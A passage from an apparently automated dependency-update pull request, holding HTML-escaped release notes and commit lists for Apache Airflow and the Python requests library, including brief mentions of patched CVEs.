Changes\n^^^^^^^^^^^^^^^^^^^\u003c/p\u003e\n\u003cp\u003eNo significant changes.\u003c/p\u003e\n\u003cp\u003eBug Fixes\n\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eImproves the handling of value masking when setting Airflow variables for enhanced security.  (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43123\"\u003e#43123\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43278\"\u003e#43278\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdds support for task_instance_mutation_hook to handle mapped operators with index 0. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42661\"\u003e#42661\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43089\"\u003e#43089\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes executor cleanup to properly handle zombie tasks when task instances are terminated. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43065\"\u003e#43065\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdds retry logic for HTTP 502 and 504 errors in internal API calls to handle webserver startup issues. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42994\"\u003e#42994\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43044\"\u003e#43044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRestores the use of separate sessions for writing and deleting RTIF data to prevent StaleDataError. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42928\"\u003e#42928\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43012\"\u003e#43012\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes PythonOperator error by replacing hyphens with underscores in DAG names. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42993\"\u003e#42993\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eImproving validation of task retries to handle None values (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42532\"\u003e#42532\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42915\"\u003e#42915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes error handling in dataset managers when resolving dataset aliases into new datasets (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42733\"\u003e#42733\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnables clicking on task names in the DAG Graph View to correctly select the corresponding task. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/38782\"\u003e#38782\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42697\"\u003e#42697\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrevent redirect loop on /home with tags/last run filters (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42607\"\u003e#42607\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42609\"\u003e#42609\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42628\"\u003e#42628\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSupport of host.name in OTEL metrics and usage of OTEL_RESOURCE_ATTRIBUTES in metrics (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42428\"\u003e#42428\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42604\"\u003e#42604\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReduce eyestrain in dark mode with reduced contrast and saturation (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42567\"\u003e#42567\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42583\"\u003e#42583\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHandle ENTER key correctly in trigger form and allow manual JSON (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42525\"\u003e#42525\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42535\"\u003e#42535\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure DAG trigger form submits with updated parameters upon keyboard submit (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42487\"\u003e#42487\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42499\"\u003e#42499\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDo not attempt to provide not \u003ccode\u003estringified\u003c/code\u003e objects to UI via xcom if pickling is active (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42388\"\u003e#42388\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42486\"\u003e#42486\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix the span link of task instance to point to the correct span in the scheduler_job_loop (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42430\"\u003e#42430\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42480\"\u003e#42480\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBugfix task execution from runner in Windows (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42426\"\u003e#42426\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42478\"\u003e#42478\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAllows overriding the hardcoded OTEL_SERVICE_NAME with an environment variable (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42242\"\u003e#42242\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42441\"\u003e#42441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eImproves trigger performance by using \u003ccode\u003eselectinload\u003c/code\u003e instead of \u003ccode\u003ejoinedload\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/40487\"\u003e#40487\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42351\"\u003e#42351\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSuppress warnings when masking sensitive configs (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43335\"\u003e#43335\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43337\"\u003e#43337\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMasking configuration values irrelevant to DAG author (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43040\"\u003e#43040\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43336\"\u003e#43336\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eExecute templated bash script as file in BashOperator (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43191\"\u003e#43191\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes schedule_downstream_tasks to include upstream tasks for one_success trigger rule (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42582\"\u003e#42582\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43299\"\u003e#43299\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd retry logic in the scheduler for updating trigger timeouts in case of deadlocks. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/41429\"\u003e#41429\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42651\"\u003e#42651\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMark all tasks as skipped when failing a dag_run manually (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43572\"\u003e#43572\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eTrySelector\u003c/code\u003e for Mapped Tasks in Logs and Details Grid Panel (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43566\"\u003e#43566\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eConditionally add OTEL events when processing executor events (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43558\"\u003e#43558\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43567\"\u003e#43567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix broken stat \u003ccode\u003escheduler_loop_duration\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42886\"\u003e#42886\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43544\"\u003e#43544\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure total_entries in /api/v1/dags (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43377\"\u003e#43377\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43429\"\u003e#43429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eInclude limit and offset in request body schema for List task instances (batch) endpoint (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43479\"\u003e#43479\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDon't raise a warning in ExecutorSafeguard when execute is called from an extended operator (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42849\"\u003e#42849\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43577\"\u003e#43577\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eMiscellaneous\n\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate session auth backend (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42911\"\u003e#42911\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved unicodecsv dependency for providers with Airflow version 2.8.0 and above (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42765\"\u003e#42765\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42970\"\u003e#42970\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove the referrer from Webserver to Scarf (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42901\"\u003e#42901\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42942\"\u003e#42942\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBump \u003ccode\u003edompurify\u003c/code\u003e from 2.2.9 to 2.5.6 in /airflow/www (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42263\"\u003e#42263\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42270\"\u003e#42270\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCorrect docstring format in _get_template_context (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42244\"\u003e#42244\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42272\"\u003e#42272\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBackport: Bump Flask-AppBuilder to \u003ccode\u003e4.5.2\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43309\"\u003e#43309\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43318\"\u003e#43318\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/c99887ec11ce3e1a43f2794fcf36d27555140f00\"\u003e\u003ccode\u003ec99887e\u003c/code\u003e\u003c/a\u003e Update RELEASE_NOTES.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/1c7fba76ec613517632931d5a268029ad24b33cb\"\u003e\u003ccode\u003e1c7fba7\u003c/code\u003e\u003c/a\u003e mark test_task_workflow_trigger_success as flaky (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42972\"\u003e#42972\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43580\"\u003e#43580\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/08bbf89225b9b87521044fa04a9666690792a4cb\"\u003e\u003ccode\u003e08bbf89\u003c/code\u003e\u003c/a\u003e FIX: Don't raise a warning in ExecutorSafeguard when execute is called from a...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/7e86bf85d3bd6fda387f0a5b189f382c0673f611\"\u003e\u003ccode\u003e7e86bf8\u003c/code\u003e\u003c/a\u003e Mark all tasks as skipped when failing a dag_run manually including t… (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43572\"\u003e#43572\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/8e79c7a27f1fdb465afdd1d4de0de7d607a27357\"\u003e\u003ccode\u003e8e79c7a\u003c/code\u003e\u003c/a\u003e Fix TrySelector for Mapped Tasks in Logs and Details Grid Panel (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43566\"\u003e#43566\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/c12e6284c1a769da58903f076b93a32b185b12f1\"\u003e\u003ccode\u003ec12e628\u003c/code\u003e\u003c/a\u003e Conditionally add OTEL events when processing executor events (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43558\"\u003e#43558\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43567\"\u003e#43567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/898f332773772fea5ae76182c5393f14d212ddf8\"\u003e\u003ccode\u003e898f332\u003c/code\u003e\u003c/a\u003e Fix broken stat scheduler_loop_duration (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42886\"\u003e#42886\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43544\"\u003e#43544\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/7aea4b56d76e80ee65613b851b5a9898df56d79a\"\u003e\u003ccode\u003e7aea4b5\u003c/code\u003e\u003c/a\u003e Ensure total_entries in /api/v1/dags (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43377\"\u003e#43377\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43429\"\u003e#43429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/9c044ea2a25240f7cc28b6e20337c2c4dc6e1e78\"\u003e\u003ccode\u003e9c044ea\u003c/code\u003e\u003c/a\u003e include limit and offset in request body schema for List task instances (batc...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/dd296c5338150cebe24c1edb46ba5a944f82a5eb\"\u003e\u003ccode\u003edd296c5\u003c/code\u003e\u003c/a\u003e This PR resolves an SQLAlchemy warning in the migration by correctly setting ...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/apache/airflow/compare/2.6.3...2.10.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.31.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.0\u003c/h2\u003e\n\u003cp\u003e2.32.0 (2024-05-20)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.0 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.31.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.23.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on 